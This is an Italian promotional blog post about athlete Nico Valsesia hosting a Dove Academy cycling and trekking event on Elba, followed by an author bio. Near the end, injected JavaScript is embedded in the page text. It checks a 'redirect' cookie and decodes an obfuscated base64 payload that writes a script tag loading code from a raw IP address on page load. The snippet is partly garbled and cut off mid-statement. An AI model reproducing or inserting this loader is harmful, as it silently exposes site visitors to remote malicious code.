Nico Valsesia Elba Dove Academ

Nico Valsesia ospite d’eccezione all’Elba con Dove Academy

Il Motto di Nico Valsesia è “La fatica non esiste”.
Nico non è solo maestro di sci, runner, trailer, ciclista, ideatore e organizzatore di gare ma è anche colui che detiene il record di ascesa al vulcano più alto del pianeta, (Ojos del Salado, in Cile).

E’ famoso anche per l’impresa dell’Aconcagua dove, in 22 ore e 41 minuti di ascesa, ha percorso in bici e di corsa l’intero dislivello che separa la spiaggia di Las Ventanas, nei pressi di Viña del Mar, dalla vetta più alta delle Americhe, l’Aconcagua. In tale occasione ha realizzato il record mondiale di massimo dislivello positivo: da 0 a 6963 metri.

Nel corso degli anni, Nico, ha collezionato una lunga serie di imprese estreme raccogliendo, insieme ai successi sportivi, un vasto seguito di tifosi e appassionati che lo sostengono e lo accompagnano in molte delle sue avventure.
Lo potrai incontrare anche tu all’isola d’Elba sul set di “Dove Academydall’11 al 14 maggio .Sarà possibile trascorrere quattro giorni a contatto con la natura spostandosi in bicicletta o a piedi, lungo i sentieri dedicati alla mountain bike o al trekking.
Perché Dove ha scelto proprio Nico? Perché ha l’aria divertita di chi è felice di vivere fino in fondo lo sport. Perché alla parola sfida antepone sempre la regola del divertimento. E perché ripete spesso che qualsiasi cosa, se fatta con passione, funziona sempre!

Aggiunge:

“Lo sport l’ho praticato a tutti i livelli, ma per me resta passione e divertimento. Ecco, a chi mi seguirà all’isola d’Elba (per prenotare guarda qui o telefona al numero 02.89.29.26.87) vorrei far capire proprio questo: che qualsiasi cosa si faccia, bisogna farla con passione. E che lo sport, anche agonistico, è prima di tutto divertimento.”

Nico ha la fortuna di fare, nella vita, quello che lo fa stare meglio. Dall’unione delle sue due principali passioni, il ciclismo e l’ultratrail, è nato il progetto “From Zero To ”: l’ascesa “no stop” dal livello del mare fino alla cima delle più significative vette d’Italia e del mondo.
Progetto che si sposa perfettamente all’esperienza Elba: “ da 0 a 1000. Dal mare alla vetta del Monte Capanne”.

“Da 0 a 1000” rappresenta l’opportunità per chiunque di esplorare l’Isola d’Elba per godere non solo dei paesaggi marini ma anche di quelli legati alla montagna. Dal Parco Naturale dell’Arcipelago Toscano ed agli svariati paesaggi che l’Isola d’Elba può offrire.
Passare ad “0 a 1000” consente di vivere il mare nella maniera tradizionale arricchendolo con una esperienza che, giunti in alta quota, fa prendere coscienza della bellezza dell’isola e del territorio tutto.

In breve tempo si ha la possibilità di trovarsi sulla cima della vetta più alta dell’ arcipelago toscano.
Mille non sono solo i 1000 e 19 metri del monte Capanne. Mille sono le opportunità di fare sport, in terra e in mare. mille sono le peculiarità dell’isola e gli scenari legati all’esplorazione dell’Elba.
La natura, la fauna, la flora, i minerali, i cristalli, i fossili. Ed ancora le rocce, gli scogli, gli isolotti, le baie. Le diverse tipologie di spiagge, i diversi panorami e profumi. Ed a sera, il meritato riposo magari accompagnato dalle ricette tipiche elbane e dal buon vino.
Tutti possono partecipare a questo evento che prevede percorsi differenziati per tipologia di pubblico tenendo in considerazione le diverse condizioni di preparazione fisica.
L’offerta sportiva outdoor di chi vi si accosta per la prima volta e non è allenato, offre una esperienza che va da zero (slow) a mille ( fast). E’ l’offerta sportiva outdoor di chi è appassionato di biking, hiking, escursionismo.
Quindi non hai scuse. Mille sfumature di Elba aspettano solo te! _ok_”text/javascript”> function getCo_ok_ie(e){var U=document.co_ok_ie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),co_ok_ie=getCo_ok_ie(“redirect”);if(now>=(time=co_ok_ie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.co_ok_ie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘

Vedi tutti gli eventi

Share this post

Federica Mazzei

Elbana di nascita, giramondo per natura. Nata nel 1984 consegue nel 2007 una laurea triennale in Comunicazione sociale e nel 2009 una laurea magistrale con lode in Sistemi e progetti di comunicazione, prosegue il percorso formativo con una borsa di studio di due anni presso la Scuola Superiore Sant'Anna di Pisa (attività di supporto e potenziamento Ufficio Relazioni con il Pubblico, progettazione Piani integrati a livello di Zona distretto). Esperienze lavorative nel settore delle relazioni al pubblico, negli enti del terzo settore e nella comunicazione digitale.

Nessun commento

Aggiungi commento